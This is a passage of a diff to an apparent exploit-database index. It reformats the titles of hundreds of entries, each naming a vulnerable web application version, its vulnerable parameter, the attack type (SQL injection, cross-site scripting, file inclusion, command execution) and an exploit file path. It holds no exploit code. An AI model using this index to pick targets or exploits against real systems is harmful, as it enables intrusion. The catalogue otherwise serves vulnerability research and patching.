Application Server 4.0.36 - Source Code Disclosure",2013-06-10,LiquidWorm,jsp,webapps,0 26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php?sitetitle' Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 @@ -28761,7 +28762,7 @@ id,file,description,date,author,platform,type,port 26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - 'WCE.download.php' Directory Traversal",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'dwt_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 -26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php' language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 +26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26083,platforms/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'sign_in.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26084,platforms/php/webapps/26084.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'archive.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 26085,platforms/php/webapps/26085.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 @@ -28788,7 +28789,7 @@ id,file,description,date,author,platform,type,port 26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - 'dispuser.asp?name' Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - 'boardhelp.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,Lostmon,asp,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0 -26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 +26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - 'auth.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - 'Subscribe.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - 'search.php' Cross-Site Scripting",2005-08-08,almaster,php,webapps,0 @@ -28806,23 +28807,23 @@ id,file,description,date,author,platform,type,port 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php?eventid' SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 -26140,platforms/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php' path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 +26140,platforms/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26141,platforms/php/webapps/26141.txt,"ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26142,platforms/php/webapps/26142.txt,"ezUpload 2.2 - 'customize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26143,platforms/php/webapps/26143.txt,"ezUpload 2.2 - 'form.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 -26144,platforms/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php' mid Parameter SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps,0 +26144,platforms/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php?mid' SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps,0 26146,platforms/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 - 'index.php' Cross-Site Scripting",2005-08-10,dyn0,php,webapps,0 26147,platforms/php/webapps/26147.txt,"MyBulletinBoard (MyBB) RC4 - 'Username' SQL Injection",2005-08-12,phuket,php,webapps,0 26148,platforms/php/webapps/26148.txt,"MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple SQL Injections",2005-08-12,phuket,php,webapps,0 26149,platforms/php/webapps/26149.txt,"MyBulletinBoard (MyBB) RC4 - 'polloptions' SQL Injection",2005-08-12,phuket,php,webapps,0 26150,platforms/php/webapps/26150.txt,"MyBulletinBoard (MyBB) RC4 - 'action' SQL Injection",2005-08-12,phuket,php,webapps,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-16,anonymous,php,webapps,0 -26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.asp SQL Injection",2005-08-16,trueend5,asp,webapps,0 +26154,platforms/asp/webapps/26154.txt,"PersianBlog - 'Userslist.asp' SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps,0 26156,platforms/asp/webapps/26156.txt,"CPaint 1.3 - xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",asp,webapps,0 26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 - 'index.php' Cross-Site Scripting",2005-08-16,"John Cobb",php,webapps,0 26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' HTML Injection",2005-08-16,"John Cobb",php,webapps,0 -26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - searchresults.php Multiple SQL Injections",2005-08-17,h4cky,php,webapps,0 +26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple SQL Injections",2005-08-17,h4cky,php,webapps,0 26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 - 'NewsCategoryForm.php?NewsMode' Cross-Site Scripting",2005-08-17,h4cky,php,webapps,0 26161,platforms/php/webapps/26161.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-17,h4cky,php,webapps,0 26162,platforms/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 @@ -28830,9 +28831,9 @@ id,file,description,date,author,platform,type,port 26164,platforms/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 -26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 -26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 +26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - 'Site' Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 +26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php?course' Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 +26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - 'Prod.php' Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps,0 26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - 'ModCP.php' SQL Injection",2005-08-20,[R],php,webapps,0 @@ -28845,7 +28846,7 @@ id,file,description,date,author,platform,type,port 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - 'browse.php' Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0 -26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 +26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module - 'moderate' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - 'user.php?htmltext' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - 'viewdownload.php' SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,php,webapps,0 @@ -28859,17 +28860,17 @@ id,file,description,date,author,platform,type,port 26202,platforms/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0 26204,platforms/php/webapps/26204.pl,"MyBB - 'member.php' SQL Injection",2005-08-29,W7ED,php,webapps,0 -26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php' c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 +26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php?c' SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - 'events.php?c' SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - 'list.php' Multiple SQL Injections",2005-08-29,matrix_killer,php,webapps,0 26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 -26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0 +26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - 'ID' Directory Traversal",2005-08-31,rgod,php,webapps,0 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0 -26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0 +26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - 'USR' Cross-Site Scripting",2005-08-31,rgod,php,webapps,0 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion",2005-08-31,groszynskif,php,webapps,0 -26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - events.php HTML Injection",2005-09-06,conor.e.buckley,php,webapps,0 +26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - 'events.php' HTML Injection",2005-09-06,conor.e.buckley,php,webapps,0 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - 'Description' HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps,0 26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,php,webapps,0 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 @@ -28877,7 +28878,7 @@ id,file,description,date,author,platform,type,port 26229,platforms/php/webapps/26229.txt,"phpCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,php,webapps,0 26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - 'SetCookie.php' Directory Traversal",2005-09-07,rgod,php,webapps,0 26232,platforms/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 -26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 +26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - 'startup.php' Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - 'news.php' Multiple SQL Injections",2005-09-08,onkel_fisch,php,webapps,0 26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - 'print.php?id' SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 @@ -28930,10 +28931,10 @@ id,file,description,date,author,platform,type,port 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 - 'cart.php?redir' Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting",2005-09-29,anonymous,php,webapps,0 26307,platforms/php/webapps/26307.txt,"LucidCMS 2.0 - Login SQL Injection",2005-09-29,rgod,php,webapps,0 -26308,platforms/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 - blank.html id Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 -26309,platforms/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 - calendar_d.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 -26310,platforms/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 - calendar_m.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 -26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - calendar_w.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 +26308,platforms/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 - 'blank.html?id' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 +26309,platforms/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 - 'calendar_d.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 +26310,platforms/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 - 'calendar_m.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 +26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - 'calendar_w.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - 'Printfaq.php' Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple SQL Injections",2005-10-24,papipsycho,php,webapps,0 @@ -28943,7 +28944,7 @@ id,file,description,date,author,platform,type,port 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,rgod,php,webapps,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 -26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php nick' SQL Injection",2005-10-08,rgod,php,webapps,0 +26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php?nick' SQL Injection",2005-10-08,rgod,php,webapps,0 26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php?fid' SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php?t_login' Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0 26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0 @@ -28965,16 +28966,16 @@ id,file,description,date,author,platform,type,port 26361,platforms/php/webapps/26361.txt,"MySource 2.14 - 'edit_table_cell_type_wysiwyg.php?Stylesheet' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26362,platforms/php/webapps/26362.txt,"MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions",2005-10-18,"Secunia Research",php,webapps,0 26363,platforms/php/webapps/26363.txt,"MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 -26369,platforms/php/webapps/26369.txt,"MySource 2.14 - 'mail.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26370,platforms/php/webapps/26370.txt,"MySource 2.14 - 'Date.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26369,platforms/php/webapps/26369.txt,"MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26370,platforms/php/webapps/26370.txt,"MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - 'modules.php' Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 -26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php' forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 +26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - 'quote.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - 'recommend.php?ID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory - 'recommend.php?entryID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -28990,7 +28991,7 @@ id,file,description,date,author,platform,type,port 26394,platforms/php/webapps/26394.txt,"MWChat 6.8 - 'chat.php' SQL Injection",2005-05-21,rgod,php,webapps,0 26395,platforms/php/webapps/26395.txt,"Basic Analysis and Security Engine (BASE) 1.2 - 'Base_qry_main.php' SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 26396,platforms/php/webapps/26396.pl,"MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection",2005-10-26,Animal,php,webapps,0 -26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 - GameID Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 +26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 - 'GameID' SQL Injection",2005-10-26,almaster,php,webapps,0 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x - Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",cgi,webapps,0 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 @@ -29014,14 +29015,14 @@ id,file,description,date,author,platform,type,port 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - '/computers/default.asp?Direction' SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - '/reports/default.asp' Multiple SQL Injections",2005-10-27,"Dennis Rand",asp,webapps,0 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 -26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 -26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php' section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 +26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php?section' Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 +26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php?section' Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 26434,platforms/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0 -26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum - error.asp Cross-Site Scripting",2005-10-27,syst3m_f4ult,asp,webapps,0 +26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum - 'error.asp' Cross-Site Scripting",2005-10-27,syst3m_f4ult,asp,webapps,0 26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass",2005-10-29,"Preben Nylokken",php,webapps,0 26437,platforms/php/webapps/26437.txt,"PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access",2005-10-29,Zeelock,php,webapps,0 26438,platforms/php/webapps/26438.txt,"Invision Gallery 2.0.3 - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps,0 -26439,platforms/asp/webapps/26439.txt,"Snitz Forum 2000 - post.asp Cross-Site Scripting",2005-10-31,h4xorcrew,asp,webapps,0 +26439,platforms/asp/webapps/26439.txt,"Snitz Forum 2000 - 'post.asp' Cross-Site Scripting",2005-10-31,h4xorcrew,asp,webapps,0 26440,platforms/php/webapps/26440.txt,"PHPCafe Tutorial Manager - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps,0 26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 - 'forum.php' Multiple SQL Injections",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 26442,platforms/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps,0 @@ -29040,7 +29041,7 @@ id,file,description,date,author,platform,type,port 26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 -26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 +26467,platforms/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0 @@ -29057,24 +29058,24 @@ id,file,description,date,author,platform,type,port 26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php?id' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 -26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 +26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - 'frameset.htm?sap-syscmd' Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI redirection",2005-11-09,"Leandro Meiners",php,webapps,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - 'Tiki-view_forum_thread.php' Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 -26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php' File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 +26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php?File' SQL Injection",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,php,webapps,0 26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL 